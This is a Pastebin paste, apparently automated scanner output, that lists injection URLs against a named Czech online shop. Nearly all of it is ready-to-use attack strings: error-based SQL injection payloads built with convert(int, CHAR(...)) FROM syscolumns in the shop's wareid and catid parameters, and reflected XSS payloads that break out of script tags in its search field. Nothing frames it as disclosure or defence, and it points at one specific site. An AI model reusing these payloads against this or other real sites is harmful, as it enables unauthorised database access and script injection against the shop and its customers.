Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [High Possibility] SQL Injection
- http://www.la-patas.cz/shop/shop.asp?wareid=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- http://www.la-patas.cz/shop/shop.asp?catid=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- http://www.la-patas.cz/shop/shop.asp?catid=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)&action=3&from=12
- URI SQL Injection
- http://www.la-patas.cz/shop/search.asp?searchtext=WCRTESTINPUT000000&save=Hledat&search=true
- XSS
- http://www.la-patas.cz/shop/search.asp?save=Hledat&search=true&searchtext='"--></style></script><script>alert(0x000775)</script>
- http://www.la-patas.cz/shop/search.asp?hledej=Hledej&search=true&searchprice=3&searchtext='"--></style></script><script>alert(0x000877)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement